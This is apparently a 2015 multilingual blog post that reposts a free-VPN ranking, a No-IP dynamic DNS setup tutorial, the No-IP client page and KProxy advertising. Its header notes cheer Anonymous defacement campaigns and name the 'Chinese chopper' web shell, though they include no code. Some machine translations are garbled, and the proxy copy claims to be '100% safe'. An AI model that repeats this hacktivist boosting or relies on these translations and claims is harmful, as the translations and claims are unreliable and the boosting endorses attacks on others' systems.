2015年9月11日 星期五

---update [12 / 09-2015] dynamic DNS update client (DUC) for Windows ,, keep your current IP address and no IP host or domain name you sync with our dynamic update client (DUC).By-http://changyang319.com(TW).&- KPROXY- Free Anonymous Web Proxy -Anonymous Proxy"- & -http://tools.rosinstrument.com/proxy/ ]- ---update[12/09-2015]動態DNS更新客戶端(DUC)的Windows,,保持你當前的IP地址與你無IP主機或域名與我們的動態更新客戶端(DUC)同步。By-http://changyang319.com(TW).-&- KPROXY - Free Anonymous Web Proxy -& - [ http://tools.rosinstrument.com/proxy/ ]- Anonymous Proxy"&-5 Best Free VPNs-**All The World Lauguage**-- Update[11/09-2015] seek knowledge regardless of geographical, see expert analysis (1)."oldest" Koran fragment "- the Russian people to learn,, is in how it forms and tutorials ?(2).Judgments about information security. sage and teacher Yin Fu in [part.1], recorded by his disciple s.- (3).from our chivalrous Anonymous fire@cat's blog, he gives us a software tool, this tool name called "Chinese chopper", which we are curious strange name, so we use our Great God Google search ..freebuf.com ..! -更新[11/09-2015]尋求知識不分地域,看專家分析(1)."最古老的“古蘭經片段"-俄羅斯人們的學習,,是在怎樣的形式和教程的呢?(2).Judgments關於信息安全。至聖先師尹福在【系統Part.1],記錄了他的弟子們..!.-(3).從我們的俠義匿名fire@cat的博客中,他給我們一種軟件工具,這工具的名字稱為"中國菜刀",這陌生的名字我們感到好奇,於是便運用我們的谷歌大神搜索了..freebuf.com..!- - Update [11/09-2015] suchen, Wissen unabhängig von geographischen, siehe Expertenanalyse (1) "älteste" Koran-Fragment. "- Das russische Volk zu lernen, ,, ist, wie es bildet und Tutorials (2)....!- - アップデート[11/09から2015]専門家の分析(1)"最古"コーランフラグメント」を参照してくださいに関係なく、地理の知識を求めて - (2)について.Judgments,,...!-**All The World Lauguage**-- Update [11-09-2015] Our favorite Apple Daily Forum famous writer " Mr. Li Yi ", portrays the voice of Hong Kong's 7 million citizens! -& By the hackread.com/anonymous-ghostsec-attacing-isis/ ]-&- By-p@r@dox17[ ‏ 9月10日]-#TangoDown by p@r@dox17 ..#Palestine_DZ #AnonGhost #OpChina -更新[11-09-2015]我們最喜愛的蘋果日報論壇著名作家李怡先生,描寫出了香港7000000市民的心聲!-與hackread.com/anonymous-ghostsec-attacing-isis/ ]-與由-p@r@dox17[ ‏ 9月10日]-#TangoDown by p@r@dox17 ..#Palestine_DZ #AnonGhost #OpChina ]-**All The World Lauguage**----Update [10/09-2015] from Taiwan Disp Technology -Disp BBS (facebook) Kanban - Author: zxc5867146] - and internet friends Chat online '' kanban '' - [Note: We really very like and enjoyed ^^] - the next is we very favorite that politics, current events in Hong Kong's Apple Daily reported and Appledaily.com.tw Oh! - (# today Hong Kong - tomorrow Taiwan) - #opchina #OPHK #OpISIS #OpRussian #Op_Tibet #optaiwan ))- >> Anonymous is omnipotent << - ---更新[10/09-2015]由台灣Disp Technology -Disp BBS (facebook)看板-作者: zxc5867146]-與網友的Chat ''看板''-[註:我們非常喜歡^^]-接下來便是我們愛看政治,時事新聞的香港 蘋果日報的報導和Appledaily.com.tw喔!-(#今日香港-明日台灣)- #opchina #OPHK #OpISIS #OpRussian #Op_Tibet #optaiwan ))- >>匿名是無所不能<< - ---Update [10 / 09-2015] aus Taiwan Disp Technologie -Disp BBS (facebook) Kanban - Autor: zxc5867146] - und Internet-Freunde Chat online '' Kanban '' - [Anmerkung: Wir sind wirklich sehr ähnlich und haben ^^] - der nächste ist, dass wir sehr beliebt, dass die Politik, aktuelle Ereignisse in Hongkong Apple Daily berichtet, und Appledaily.com.tw Oh! - (# Heute Hong Kong - morgen Taiwan) - #opchina #OPHK #OpISIS #OpRussian #Op_Tibet #optaiwan)) - >> Anonymous ist allmächtig <<- ---台湾DISP技術-Disp BBSから更新[10/09から2015](Facebookの)かんばん - 著者:zxc5867146] - -**All The Wold Country Lauguage**-

---update [12 / 09-2015] dynamic DNS update client (DUC) for Windows ,, keep your current IP address and no IP host or domain name you sync with our dynamic update client (DUC).By-http://changyang319.com(TW).&- KPROXY- Free Anonymous Web Proxy -Anonymous Proxy"- &
-http://tools.rosinstrument.com/proxy/ ]&-5 Best Free VPNs-
---update[12/09-2015]動態DNS更新客戶端(DUC)的Windows,,保持你當前的IP地址與你無IP主機或域名與我們的動態更新客戶端(DUC)同步。By-http://changyang319.com(TW).-&- KPROXY - Free Anonymous Web Proxy -&
-http://tools.rosinstrument.com/proxy/ ]- Anonymous Proxy"--5 Best Free VPNs-**All The World Lauguage**-


 - Update[11/09-2015] seek knowledge regardless of geographical, see expert analysis (1)."oldest" Koran fragment "- the Russian people to learn,, is in how it forms and tutorials ?(2).Judgments about information security. sage and teacher Yin Fu in [part.1], recorded by his disciple s.- (3).from our chivalrous Anonymous fire@cat's blog, he gives us a software tool, this tool name called "Chinese chopper", which we are curious strange name, so we use our Great God Google search ..freebuf.com ..! -
-更新[11/09-2015]尋求知識不分地域,看專家分析(1)."最古老的“古蘭經片段"-俄羅斯人們的學習,,是在怎樣的形式和教程的呢?(2).Judgments關於信息安全。至聖先師尹福在【系統Part.1],記錄了他的弟子們..!.-(3).從我們的俠義匿名fire@cat的博客中,他給我們一種軟件工具,這工具的名字稱為"中國菜刀",這陌生的名字我們感到好奇,於是便運用我們的谷歌大神搜索了..freebuf.com..!-
- Update [11/09-2015] suchen, Wissen unabhängig von geographischen, siehe Expertenanalyse (1) "älteste" Koran-Fragment. "- Das russische Volk zu lernen, ,, ist, wie es bildet und Tutorials (2)....!-
- アップデート[11/09から2015]専門家の分析(1)"最古"コーランフラグメント」を参照してくださいに関係なく、地理の知識を求めて - (2)について.Judgments,,...!-**All The World Lauguage**-


- Update [11-09-2015] Our favorite Apple Daily Forum famous writer " Mr. Li Yi ", portrays the voice of Hong Kong's 7 million citizens! -& By the hackread.com/anonymous-ghostsec-attacing-isis/ ]-
-更新[11-09-2015]我們最喜愛的蘋果日報論壇著名作家李怡先生,描寫出了香港7000000市民的心聲!-與hackread.com/anonymous-ghostsec-attacing-isis/ ]-**All The World Lauguage**-
-

 ---Update [10/09-2015] from Taiwan Disp Technology -Disp BBS (facebook) Kanban - Author: zxc5867146] - and internet friends Chat online '' kanban '' - [Note: We really very like and enjoyed ^^] - the next is we very favorite that politics, current events in Hong Kong's Apple Daily reported and Appledaily.com.tw Oh! - (# today Hong Kong  - tomorrow Taiwan) - #opchina  #OPHK  #OpISIS  #OpRussian  #Op_Tibet  #optaiwan ))- >> Anonymous is omnipotent << -
---更新[10/09-2015]由台灣Disp Technology -Disp BBS (facebook)看板-作者: zxc5867146]-與網友的Chat ''看板''-[註:我們非常喜歡^^]-接下來便是我們愛看政治,時事新聞的香港 蘋果日報的報導和Appledaily.com.tw喔!-(#今日香港-明日台灣)- #opchina #OPHK #OpISIS #OpRussian #Op_Tibet #optaiwan ))- >>匿名是無所不能<< -
---Update [10 / 09-2015] aus Taiwan Disp Technologie -Disp BBS (facebook) Kanban - Autor: zxc5867146] - und Internet-Freunde Chat online '' Kanban '' - [Anmerkung: Wir sind wirklich sehr ähnlich und haben ^^] - der nächste ist, dass wir sehr beliebt, dass die Politik, aktuelle Ereignisse in Hongkong Apple Daily berichtet, und Appledaily.com.tw Oh! - (# Heute Hong Kong - morgen Taiwan) - #opchina #OPHK #OpISIS #OpRussian #Op_Tibet #optaiwan)) - >> Anonymous ist allmächtig <<-
---台湾DISP技術-Disp BBSから更新[10/09から2015](Facebookの)かんばん - 著者:zxc5867146] - 、インターネットの友人オンライン ''かんばん」をチャット ' - **All The Wold Country Lauguage**- 




**Please use the Google god of high-tech translator to translate your national / local language ah ^^ -
**請各位使用谷歌大神的高科技翻譯器來翻譯你們的國家/地方的語言啊^^-
**지역 / 국가 언어 ^^ 번역 하이테크 번역기의 구글 하나님을 사용하십시오 -
**Se il vous plaît utiliser le dieu Google de traducteur de haute technologie pour traduire votre ah langue nationale / locale ^^-
**あなたの国内/地域言語ああ^^翻訳するハイテクトランスレータのGoogleの神を使用してください -
**Будь ласка, використовуйте бога Google високотехнологічного перекладача, щоб перевести свій національним / регіональним мовою ах ^^-
**กรุณาใช้พระเจ้าของ Google แปลที่มีเทคโนโลยีสูงในการแปล / ชาติภาษาท้องถิ่นของคุณอา ^^-
**Si prega di utilizzare il dio Google Traduttore di high-tech per tradurre il vostro / ah lingua locale nazionale ^^-
**Fadlan isticmaal ilaah Google ee turjumaan farsmada heerka sare ah loo turjumi / ka ah luuqada maxaliga ah ee qaranka ^^-
**Gunakan dewa Google penerjemah berteknologi tinggi untuk menerjemahkan nasional / ah bahasa lokal ^^-
**Por favor, utilice el dios Google Traductor de alta tecnología para traducir su / ah nacional idioma local ^^-
**आफ्नो राष्ट्रिय / स्थानीय भाषा आह ^^ अनुवाद गर्न उच्च-प्रविधी अनुवादक को गुगल देवता प्रयोग गर्नुहोस् -
**Bonvolu uzi la Google dio de alta-tech tradukisto por traduki vian nacian / lokan lingvon ah ^^-

Best VPN.com https://www.bestvpn.com/blog/



5 Best Free VPNs


The Free VPNs we have selected a number of limitations. Other Free VPNs might be stealing and selling your data to make their money and we’d highly discourage it – see this article on Hola if you don’t believe us. We highly recommend you use a cheap VPN instead, take a look at our guide here.

While most VPNs are priced under $10/ month, this may be more than some people can afford, so free VPNs are always appreciated. While these are usually limited in one way or another, the ones we’ve selected provide a great service at zero cost.
It’s hard for a free service to compete with a paid one due to the downsides, which we consider for each VPN respectively. However, the services we’ve selected will still help you achieve privacy and security while carrying out your daily internet activities.

Free VPN Summery

CyberGhost


  • PROS
  • No logs
  • Based in Romania
  • Accepts Bitcoin
  • Shared IPs
  • CONS
  • Multiple simultaneous connections only allowed on most expensive plan
  • Speed cap
CyberGhost is a large Romanian company that regularly updates its features and software for both free VPN and paid users. Its security is impressive, going as far as deleting your payment details once they’ve been processed. It’s also working on some security technologies itself and is willing to support promising security start-ups too! Its client and customer support are first class.
While its free service has a number of limitations, including speed, time and advertisements, CyberGhost is superb all round.
Try Out the Best Free VPN Today!

2nd place

SurfEasy

4.84.84.84.84.8 4,8/5

SurfEasy Logo
  • PROS
  • Great speeds
  • Five simultaneous connections
  • Easy-to-use software
  • Phone support
  • CONS
  • Download cap (more can be earned)
  • No P2P
SurfEasy is a fantastic Canadian company, with aims of bringing privacy and security to the masses, so it’s no surprise that it provides a free service alongside its normal plans. All of its plans come with a whopping five simultaneous connections, sport easy-to-use clients and offer good speeds.
Its free VPN plan is just as good as its normal plan, but does come with a data limit of 500MB (which can be increased to 1.5GB with a few tasks), which is only useful for occasional/normal use. Also, in order to be able to provide the security that it does, no P2P is allowed.
If you’re looking for something different, it also offers a Private Browser USB product, which comes with an initial fee but is valid for a lifetime.

3rd place

TunnelBear

4.84.84.84.84.8 4,8/5

TunnelBear Logo
  • PROS
  • Entertaining
  • Minimal logs
  • Great performance
  • Great clarity
  • CONS
  • Limited countries
  • No P2P
  • Download cap
In many respects, TunnelBear is very similar to SurfEasy: it’s Canadian, for the everyday user and doesn’t allow P2P. Even its pricing is similar for the paid packages. We found TunnelBear’s support to be better, and its client a bit more useful and entertaining.
It provides three simultaneous connections, up to 1.5GB download limit and overall is a very good company for providing a free VPN.

4th place

Hotspot Shield

4.74.74.74.74.7 4,7/5

Hotspot Shield Logo
  • PROS
  • Great software
  • Easy to use
  • Low price for premium and, of course, a free VPN service is available
  • CONS
  • Free plan is limited to US servers and advertising is supported
Hotspot Shield is a great all-round provider. It focuses heavily on its always-on protection system that keeps customers safe while connected to the internet, no matter where they are. To this end, it offers an excellent free service, a great application and software that supports all the major operating systems.
On the downside, the free version is advertising supported and you’re only able to connect to its US servers using it – and access to Netflix and Hulu is disabled too. Since it’s designed to be usable by the average person, there are unfortunately no advanced features, and the exact technical details are slightly hard to find out.


Bonus

Bonus. Tor

4.54.54.54.54.5 4,5/5

Tor Logo
  • PROS
  • Ery secure way (paid or unpaid) to maintain online anonymity (although bear in mind that nothing is 100% secure)
  • Easy to install and use
  • CONS
  • Technically not a VPN
  • Slow
  • No P2P
Not strictly a VPN service, but as a widely used free system designed to ensure online anonymity it seemed criminal not to mention the Tor Network here. The open source Tor client allows you to connect to the internet anonymously through a distributed network (other Tor users) using a layered encryption service known as Onion Routing. This means that whenever you access a website your request will pass through at least three different computers (called nodes), with all information encrypted each time to provide a very high level of security. In addition, because your apparent IP is that of a random volunteer (of which there are literally hundreds of thousands), there’s no way to even determine that you are masking your identity. This makes this service famously invaluable for dissidents living under restrictive governments.
The main downside is that it’s not fast, as your traffic is being bounced around volunteers’ computers across the world. The Tor Network also asks you not to use the service for P2P file sharing. The amount of traffic involved puts a severe strain on the system and damages other users’ experience.
One use the truly paranoid may have for the Tor Network is in conjunction with Bitcoin payments. It allows them to maintain complete anonymity when signing up to and purchasing regular VPN packages.

Free VPN Conclusion

When you’re considering a free VPN, make sure that you’re aware of all the restrictions imposed.
We believe CyberGhost to be the best free VPN provider out there. This is due not only to the quality of its service, but because it offers the most sensible restrictions. Its speed cap means that you’ll be able to use the service as much as you want while always being protected. Granted you’ll be disconnected every six hours, but this shouldn’t be a big downside.
The other VPNs listed also have a lot to offer, and since they’re all free you can give them a full try before deciding which one to use. Perfect! So if your wallet is tight but you’d still like to be protected while on the internet, we highly recommend trying one of these completely free VPNs. Have a look at our summary below if you haven’t made up your mind yet.
Written by Peter Selmeczy

I am an engineer by trade and tech geek by night, who's passionate about sharing his knowledge with the people. Find me on Google+.






 =====
 https://www.bestvpn.com/blog/

Best VPN.com5最佳免費的VPN

自由的VPN我們已選擇了一些限制。 其他免費的VPN可能是盜賣你的數據,以使他們的錢,我們會強烈反對這樣做-看這篇文章的HOLA的 ,如果你不相信我們。 我們強烈建議您使用廉價的VPN替代,看看我們的導遊在這裡

雖然大多數的VPN的售價在$ 10 /月,這可能比一些人能買得起,所以免費的VPN總是讚賞。 雖然這些通常是有限的或那種方式,我們選擇了那些成本提供一流的服務
這是很難的免費服務與付費1的競爭,由於缺點,我們分別考慮為每個VPN。 但是,我們所選擇的服務,還是將幫助你實現私密性和安全性,同時開展你的日常互聯網活動。

免費VPN總結

級別 供應商 游離 牌號 聯繫

1

叫Cyber​​Ghost免費VPN速度上限 4.94.94.94.94.9
閱讀評論>

2

SurfEasy徽標下載第 4.84.84.84.84.8
閱讀評論>

3

TunnelBear徽標下載第 4.84.84.84.84.8
閱讀評論>

4

熱點盾徽標僅適用於美國,廣告支持 4.74.74.74.74.7
閱讀評論>

VPNGate徽標教育發展 4.54.54.54.54.5
閱讀評論>

Tor的標誌從技術上講不是一個VPN 4.54.54.54.54.5
獲獎者

叫Cyber​​Ghost

4.94.94.94.94.9 4,9 / 5


  • PROS
  • 沒有日誌
  • 總部設在羅馬尼亞
  • 接受比特幣
  • 共享的IP地址
  • 缺點
  • 多個同時連接只允許上最昂貴的計劃
  • 速度上限
叫Cyber​​Ghost是一個大的羅馬尼亞公司定期更新其功能和軟件為免費VPN和付費用戶。 它的安全性令人印象深刻,會盡可能刪除後,他們已經被處理您的付款細節。 它也開發一些安全技術本身並願意支持有前途的安全創業公司呢! 它的客戶端和客戶支持是一流的。
雖然它的免費服務有一些限制,包括速度,時間和廣告,叫Cyber​​Ghost俱佳全面。
試出最好的免費VPN今天!

第二名

SurfEasy

4.84.84.84.84.8 4,8 / 5

SurfEasy徽標
  • PROS
  • 大速度
  • 五並發連接
  • 易於使用的軟件
  • 電話支持
  • 缺點
  • 下載帽(更可賺取)
  • 沒有P2P
SurfEasy是一個夢幻般的加拿大公司,帶來隱私和安全群眾的目的,所以一點也不奇怪,它提供了一個免費的服務,沿著它的正常計劃。 它的所有計劃都配備了高達五台並發連接,運動易於使用的客戶端,並提供良好的速度。
它的免費VPN的計劃是一樣好,它的正常計劃,但並配備了500MB的數據流量限制(可提高到1.5GB有幾個任務),這是只有偶爾/正常使用很有用。 另外,為了能夠提供它確實的安全性,沒有點對點是允許的。
如果你正在尋找不同的東西,它也提供了專用瀏覽器的USB產品,它配備了一個加盟費,但有效的一生。

第3名

TunnelBear

4.84.84.84.84.8 4,8 / 5

TunnelBear徽標
  • PROS
  • 娛樂
  • 最小的日誌
  • 卓越的性能
  • 非常清晰
  • 缺點
  • 有限的國家
  • 沒有P2P
  • 下載帽
在許多方面,TunnelBear非常類似於SurfEasy:它是加拿大,為日常用戶和不允許的P2P。 即使它的定價是相似的付費套餐。 我們發現TunnelBear的支持更好,而且它的客戶多一點有用和有趣。
它提供了3個同步連接,高達1.5GB的下載限制,整體是一個很好的公司提供了一個免費的VPN。

第4位

熱點盾

4.74.74.74.74.7 4,7 / 5

熱點盾徽標
  • PROS
  • 偉大的軟件
  • 易於使用
  • 低廉的價格溢價,當然,免費的VPN服務提供
  • 缺點
  • 免費計劃僅限於美國的服務器,並支持廣告
熱點盾是一個偉大的全方位的供應商。 它集中了大量永遠在線的保護制度,保持客戶的安全,同時連接到互聯網上,無論他們在哪裡。 為此,它提供了一個極好的免費服務,一個偉大的應用程序和軟件,支持所有主要的操作系統。
缺點是,免費版本是廣告支持,你只能用它連接到其在美國的服務器 - 並獲得Netflix和Hulu的被禁用了。 由於它的設計是由普通人使用,有沒有遺憾的先進功能,以及確切的技術細節略有很難找到了。


獎金

獎金。 托爾

4.54.54.54.54.5 4,5 / 5

Tor的標誌
  • PROS
  • 紅黴素安全的方式(有償或無償),以保持網絡匿名(但請記住,沒有什麼是100%安全的)
  • 易於安裝和使用
  • 缺點
  • 從技術上講不是一個VPN
  • 遲緩
  • 沒有P2P
不是嚴格意義上的VPN服務,但作為旨在確保網絡匿名一個廣泛使用的免費的系統,似乎刑事不提Tor網絡在這裡。 開源Tor客戶端,您可以通過分佈式網絡(其他Tor用戶)使用被稱為洋蔥路由分層加密服務連接到互聯網匿名。 這意味著,只要你訪問一個網站,你​​的要求將通過至少有三個不同的計算機(稱為節點),與加密每次提供的安全性非常高的水平的所有信息。 此外,因為你明顯的IP是一個隨機的志願者(其中有數百個千計)說,沒有辦法,甚至決定你是掩蓋自己的身份。 這使得該服務著名無價的生活在限制政府的持不同政見者。
其主要缺點是,它並不快,因為你的流量被彈起了志願者的計算機在世界各地。 Tor網絡也請你不要使用該服務的P2P文件共享。 所涉及的交通量提出一個嚴峻的應變系統,並損害其他用​​戶的經驗。
一個使用真正的偏執狂可能對Tor網絡是與比特幣付款相結合。 這使他們能簽約並購買普通VPN包時保持完全匿名。

免費VPN結論

當你考慮一個免費的VPN,請確保你知道所有規定的限制。
我們相信,叫Cyber​​Ghost是最好的免費VPN提供商那裡。 這是由於不僅其服務質量,但因為它提供了最明智的限制。 它的速度上限意味著你就可以使用該服務盡可能多的,只要你想同時始終受到保護。 當然,你會被斷開每六個小時,但是這不應該是一個很大的弊端。
還列出了其他VPN有很多提供,並且因為它們都是免費的,你可以決定使用哪一個之前給他們一個完整的嘗試。 完美! 所以,如果你的錢包是緊張,但你還是喜歡被保護,而在互聯網上,我們強烈建議您嘗試這些完全免費的VPN中的一個。 看看如果你還沒有下定決心但低於我們的總結。


級別 供應商 游離 牌號 聯繫

1

叫Cyber​​Ghost免費VPN速度上限 4.94.94.94.94.9
閱讀評論>

2

SurfEasy徽標下載第 4.84.84.84.84.8
閱讀評論>

3

TunnelBear徽標下載第 4.84.84.84.84.8
閱讀評論>

4

熱點盾徽標僅適用於美國,廣告支持 4.74.74.74.74.7
閱讀評論>

VPNGate徽標教育發展 4.54.54.54.54.5
閱讀評論>

Tor的標誌從技術上講不是一個VPN 4.54.54.54.54.5

 =====










http://changyang319.com/archives/2234

DDNS set of teaching, using the No-IP
services, and the use of DUC dynamic program to correspond with the IP address of the host

No-IP DDNS service provided by the company

Whether at home or in the company, Chunghwa Telecom ADSL (actually VDSL, for general spoken language, it is called ADSL), have been the original eight dynamic IP into a fixed IP + 7 a dynamic IP ( Chunghwa Telecom Change fixed IP address ), and this fixed IP have also been used to set up a company or personal website, so the remaining dynamic IP, not easy to compare the official site.

 But for some special needs, and they do not care about the URL, and when he just wants to take advantage of these dynamic IP, nor is it feasible, in addition to the use of teaching had before " DDNS setting teaching, using the D-Link wireless IP sharing device "using IP sharing device to synchronize these dynamic IP outside, if you do not have to share the words, another way is through the automatic update of IP client software.
 
Provide DDNS service industry there are many, probably most common in the case of " DynDNS "and" No-IP "two, Manduo sharing device will support DynDNS, but not necessarily to support" No-IP ", so I their habits, if you have to pass through "sharing device" to do DDNS function, I would choose "DynDNS"; and if it is to directly connect to the Internet using PPPoE dial-up, then I will use the "No-IP" because No-IP DUC has provided software allows us to install on your computer, whereby we notice No-IP computers currently used IP address.
And before we begin teaching again, you will need to come from behind, " No-IP "website, to apply for No-IP account.
2234-01
Step 1. After applying finish account, log in to your No-ip account, then click the top left corner of the "Hosts / Redirects", and then click from the feature layout "Manage Hosts", and finally click "Add A Host." No-IP free to let your new "five" host, from the example of the figure below, you can see that I already have two of.
2234-02
Step 2. In the "Add a host" face page, at first glance, it seems there are many professional fields require you to fill in, but in fact the most basic simply fill out the two fill-bit only, one is the host name you want ( name can not be identical, and others), the other is from the drop-down menu, select a "domain name."
2234-03
However, when selecting "Domain Name", not every one can be selected, the choice, you should see some of these domain classification, such as "No-IP Enhanced Domains", "No-IP Plus Domains "" No-IP Free Domains ", but in fact you can only select" No-IP Free Domains "this part of the domain name, the domain name the rest of the names are paid.
2234-04
Step 3. Then you have just joined the Host, you can see in the list.
2234-05
But not over Oh, here you are only half to set to work, in general, for the first time this setting, this setting HOST site, there is the opportunity to direct the operation, as long as you are in the set, with the computers in the set, which would fill in the IP address of the correct IP, or you can put the current directly into the correct IP fill, a good first set will operate.

 But if you re-dial, replace the computer's IP how to do it?
Of course, you can also manually on No-IP Web site to the IP address of the Host make amendments, but in general, no one will do these things manually, but not blazing nothing to do, is not suitable for dynamic IP Elevated main The reason is for this reason that we should have been corrected "domain name" corresponds to the "Host IP" is.
So, then the best you need to have a program to do this, and No-IP to write this program "DUC (Dynamic Update Client)" to help you complete this tiresome correspondence work, which do most of the next paragraph commentary.

Using the corresponding No-IP DUC do host and domain

To use the DUC (Dynamic Update Client) , of course, is to first go to No-IP's Web site to download the program to update the IP, downloaded at the following address:
No-IP DUC (Dynamic Update Client) program download
Step 1. Click on the [Download Now], and install the DUC program.
2234-06
Step 2. Enter your No-IP account and password, then click [OK], as shown below:
2234-07
Step 3. Next, you want to set on this host, which you want to set the corresponding unit host, then you can click on [Edit Hosts].
2234-08
Step 4. Next, you have to set a good will list Host list, just select the corresponding Host you want from the list, and finally click [Save] can. This step is set, unless you have to modify, to otherwise, you only have to do it once, and then just run the program will automatically correspond to what you want Host.
2234-09
See these three green "tick", which represents the IP host has a good correspondence.

 2234-10


 =====
http://changyang319.com/archives/2234

DDNS設定教學,使用No-IP服務,及利用DUC程式動態來對應主機與IP位址


No-IP公司所提供的DDNS服務


無論在家裡或是公司裡的中華電信ADSL(實際上是VDSL,為了一般口語,才稱為ADSL),都已經將原本8個動態IP改成1個固定IP+7個動態IP了(中華電信更改固定IP網址),而這個固定IP也都已經用來架設公司或是個人網站了,所以剩下來的動態IP,就不方便用來比較正式的網站了。
但是對於一些特別的需求,且不在意網址,而硬是想要利用這些動態IP時,也不是不可行,除了利用之前教學過的「DDNS設定教學,使用D-Link無線IP分享器」,使用IP分享器來同步這些動態IP之外,若你沒有分享器的話,另外一個方法,就是透過自動更新IP的客戶端軟體。
提供DDNS服務的業者有很多,最常見的大概就屬「DynDNS」和「No-IP」 這兩家,蠻多的分享器都會支援DynDNS,但卻不一定支援「No-IP」,所以,我自己的習慣,如果有要透過「分享器」來做到DDNS功能時,我會選擇 「DynDNS」;而如果是要直接使用PPPoE撥號連線上網的話,我就會使用「No-IP」,因為No-IP有提供DUC軟體,可以讓我們安裝在電腦 上,藉此通知No-IP我們電腦目前所使用的IP位址。
而再開始我們的教學之前,你必需要先至「No-IP」網站,去申請No-IP的帳號。
2234-01
Step 1. 申請完帳號後,請登入您的No-ip帳號,接著點擊左上角的「Hosts/Redirects」,接著再從該功能版面中點擊「Manage Hosts」,最後再點擊「Add A Host」。No-IP可以免費讓你新增「5部」主機,從下圖的範例中,可以看到我原本就已經有2部了。
2234-02
Step 2. 在「Add a host」面頁中,乍看之下,好像有很多專業的欄位需要你填寫,但其實最基本只要填寫兩個填位而已,一個是你想要的主機名稱(名稱不可以和別人相同),另一個則是從下拉式選單中,選擇一個「網域名稱」。
2234-03
但在選擇「網域名稱」時,也不是每一個都可以選,在選擇時,你應該會看到這些網域有一些分類,像是「No-IP Enhanced Domains」、「No-IP Plus Domains」、「No-IP Free Domains」,但實際上你只能選擇「No-IP Free Domains」這部份的網域名稱,其餘的名稱都是付費的網域名稱。
2234-04
Step 3. 接著你剛才加入的Host,就可以在清單中看到了。
2234-05
但還沒有結束喔,到這邊你只做了一半的設定工作,一般來說,初次這樣設定時,這個設定的HOST網址,是有機會可以直接運作的,只要你在設定時,是用該部 電腦在設定,這樣就會在IP的位址填入正確的IP,或者你也可以直接就把目前正確的IP填進去,初次的設定就會運作的很好。
Advertisement
但要是你重新撥號,更換了電腦的IP怎麼辦呢?
當然,你也可以手動的上No-IP網站來把該Host的IP位址做修正,但一般來說,沒有人會手動做這些事,又不是閒閒沒事做,動態IP不適合架站最主要的原因,就是這個原因,我們要一直的修正「網域名稱」與「主機IP」的對應。
所以,這時最好就需要有一支程式來做這件事,而No-IP就寫出這個程式「DUC(Dynamic Update Client)」來幫你完成這煩人的對應工作,這部份在下一段來做解說。

使用No-IP DUC來做主機及網域的對應

要使用DUC(Dynamic Update Client),當然是先要去No-IP的網站來下載程式,來更新IP,下載的網址如下:
No-IP DUC(Dynamic Update Client)程式下載
Step 1. 請點擊〔Download Now〕,並且安裝好DUC程式。
2234-06
Step 2. 輸入你的No-IP的帳號及密碼,接著點擊〔OK〕,如下圖:
2234-07
Step 3. 接下來要設定在這部主機上,你想要設定對應哪部主機,這時可以點擊〔Edit Hosts〕。
2234-08
Step 4. 接下來會列出你已經設定好的Host清單,只要從清單中選擇你想要對應的Host,最後再點擊〔Save〕即可。這設定的步驟,除非你還有要修改,要不然的話,你只需要做一次就可以了,之後只要執行程式就會自動對應你想要的Host。
2234-09
看到這三個綠色的「打勾」,即代表host已經對應好IP了。
2234-10


 =====



Dynamic DNS Update Client (DUC) for Windows

Keep your current IP address in sync with your No-IP host or domain with our Dynamic Update Client (DUC).

Download Now

Our Dynamic DNS Update Client continually checks for IP address changes in the background and automatically updates the DNS at No-IP whenever it changes.
 https://www.noip.com/client/DUCSetup_v4_1_1.exe
 236kb,, v4.1.1.


Host Creation (Plus & Enhanced Users
If you are an Enhanced Dynamic DNS or Plus Managed DNS customer, you are able to easily add hostnames directly from the Dynamic Update Client.

 Client Tracking
This feature allows you to see a list of each location where you have a DUC installed. You can also set each update Client ID to a custom name for example, home, work, client name, etc to help keep track of each.

 Secure Key Based Updates
Our secure DUC does not resend your No-IP credentials each time it sends an IP address update, instead it sends a unique key for username and password for your specific Dynamic Update Client.

 Runs When Logged Out
If your computer is running, your hostname will still be updated when your IP address changes.

 Notifications
Receive notifications when a service is about to expire, or if we send out an important network update.
 
DUC v4.1.1 Runs On XP & Up
Please contact us if you need support for an earlier os version.



Installation

Download the Windows update client by clicking the link above and saving the file. Double-click the downloaded file and follow the on-screen instructions.
The installation will complete and the application will ask for your account information. After your username and password have been authenticated you will be shown a list of hostnames. Select the hostnames that you would like updated to the IP address of your computer.


=====




動態DNS更新客戶端(DUC)的Windows

保持你當前的IP地址與你無IP主機或域名與我們的動態更新客戶端(DUC)同步。

立即下載

我們的動態DNS更新客戶端不斷地檢查在後台更改IP地址,並自動更新的DNS,不-IP,
只要稍有改變。
 https://www.noip.com/client/DUCSetup_v4_1_1.exe

主機創建(加號和增強的用戶
。如果你是一個增強的動態DNS或加託管DNS客戶,你可以很容易地直接從動態更新客戶端添加主機名。

客戶端跟踪
該功能可以讓你看到你已經安裝了一個DUC每個位置的列表。您還可以設置每個更新客戶端ID,例如,家庭,工作,客戶名稱等,以幫助跟踪每一個自定義名稱。

安全密鑰基礎的更新
我們的安全DUC不發送一個IP地址更新每次重新發送無IP憑據,而是發送一個唯一鍵的用戶名和密碼,為您的特定動態更新客戶端。

運行時已註銷
如果您的計算機運行的是,您的主機仍然會當你的IP地址更改更新。

通知
收到通知時服務即將到期,或者如果我們發出了一個重要的網絡更新。

DUC V4.1.1運行在XP及以上
,請與我們聯繫,如果您需要為早期操作系統版本的支持。


 =====

KPROXY - Free Anonymous Web Proxy - Anonymous Proxy





Change Server [+]


KPROXY EXTENSION

No Chrome or Firefox?
Download KProxy Browser. It is a portable Firefox browser configured with KProxy Extension. It doesn't need any installation, just unzip and surf!
100% sites will work
Web based proxies are a pain, forget you are using a proxy with KProxy Extension. If any site doesn't work I'll eat my hat.
100% safe
KProxy Agent encrypts the connection between your browser to your target server, making impossible to steal your data.
Use it at work, university, etc...
KProxy Extension works through the Internet proxies installed at work, university, library... Your connection will be seen as a regular http connection.
Connect everything
Any program or even Windows can use KProxy Extension to connect to Internet. It converts your computer in a proxy server and other devices (a cell phone, a TV...) can hide their traffic behind KProxy Servers.
Better than a VPN
KProxy Extension is not a VPN, an easy to block and slow protocol. Your connection will be seen as a regular http connection. Change to a new server instantly.
It's free!
No registration or credit card is required to use it. Enjoy, it also has no ads! Too good to be true? Just download it and surf.


DOWNLOADS
kproxy Extension
KProxy Extension is the definitive weapon against censorship. Bypass any filter and protect your identity with just one click. It is extremely easy to use and it works great under an Internet proxy (at work, university, library, etc).

Enjoy complete security, even on public WIFI connections. Prevent hackers stealing your personal passwords, bank account and credit card details.

100% sites will work
100% safe
Better than a VPN
Free
KProxy Extension is not just a tool for your browser. It will convert your browser in a proxy application ready for everything, just configure the proxy settings of any program (or even Windows) or any device and change their location instantly.

Chrome


Firefox

kproxy Browser
need a portable solution?
